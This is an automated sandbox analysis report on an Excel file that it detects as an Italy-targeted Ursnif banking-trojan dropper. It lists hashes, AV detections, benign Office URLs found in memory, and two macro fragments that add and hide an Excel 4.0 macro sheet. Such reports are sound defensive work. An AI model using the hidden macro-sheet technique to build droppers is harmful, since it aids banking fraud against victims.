Loading ...

Play interactive tourEdit tour

Windows Analysis Report sample20211025-01.xls

Overview

General Information

Sample Name:sample20211025-01.xls
Analysis ID:508537
MD5:2172d539dfc31f78f87363c9837fc788
SHA1:a0af38a44615a87108f842cf32f5b5f8b289fe43
SHA256:7116c93e85891626185692c325a7c648bf2f2effb5c05582f77a18144b620164
Infos:

Most interesting Screenshot:

Detection

Ursnif Dropper
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found detection on Joe Sandbox Cloud Basic with higher score
Multi AV Scanner detection for submitted file
Detected Italy targeted Ursnif dropper document
Document contains an embedded VBA macro with suspicious strings
Document contains embedded VBA macros

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: sample20211025-01.xlsVirustotal: Detection: 10%Perma Link
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: excel.exeMemory has grown: Private usage: 1MB later: 69MB
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.aadrm.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.aadrm.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.cortana.ai
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.office.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.onedrive.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://augloop.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://augloop.office.com/v2
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cdn.entity.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://clients.config.office.net/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://config.edge.skype.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cortana.ai
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cortana.ai/api
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://cr.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dev.cortana.ai
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://devnull.onenote.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://directory.services.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://graph.windows.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://graph.windows.net/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://lifecycle.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://login.windows.local
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://management.azure.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://management.azure.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://messaging.office.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ncus.contentsync.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://officeapps.live.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://onedrive.live.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://osi.office.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office365.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office365.com/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://pages.store.office.com/review/query
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://powerlift.acompli.net
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://roaming.edog.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://settings.outlook.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://staging.cortana.ai
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://tasks.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://webshell.suite.office.com
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://wus2.contentsync.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: D996E009-EEFC-4DD9-8747-5D20986EEBA9.0.drString found in binary or memory: https://www.odwebp.svc.ms

E-Banking Fraud:

barindex
Detected Italy targeted Ursnif dropper documentShow sources
Source: Initial sampleOLE, VBA macro line: Ursnif specific tokens

System Summary:

barindex
Found detection on Joe Sandbox Cloud Basic with higher scoreShow sources
Source: sample20211025-01.xlsJoe Sandbox Cloud Basic: Detection: malicious Score: 52 Threat Name: Ursnif DropperPerma Link
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: sample20211025-01.xlsOLE, VBA macro line: Excel4MacroSheets.Add(Before:=Worksheets((1))).Name = Ecco_la: l_esperienza
Source: sample20211025-01.xlsOLE, VBA macro line: ActiveSheet.Visible = 0
Source: sample20211025-01.xlsOLE indicator, VBA macros: true
Source: sample20211025-01.xlsVirustotal: Detection: 10%
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{E636E697-9D04-460D-8980-EAFBD79920B6} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: sample20211025-01.xlsOLE indicator, Workbook stream: true
Source: classification engineClassification label: mal68.bank.expl.winXLS@1/1@0/0
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionExtra Window Memory Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
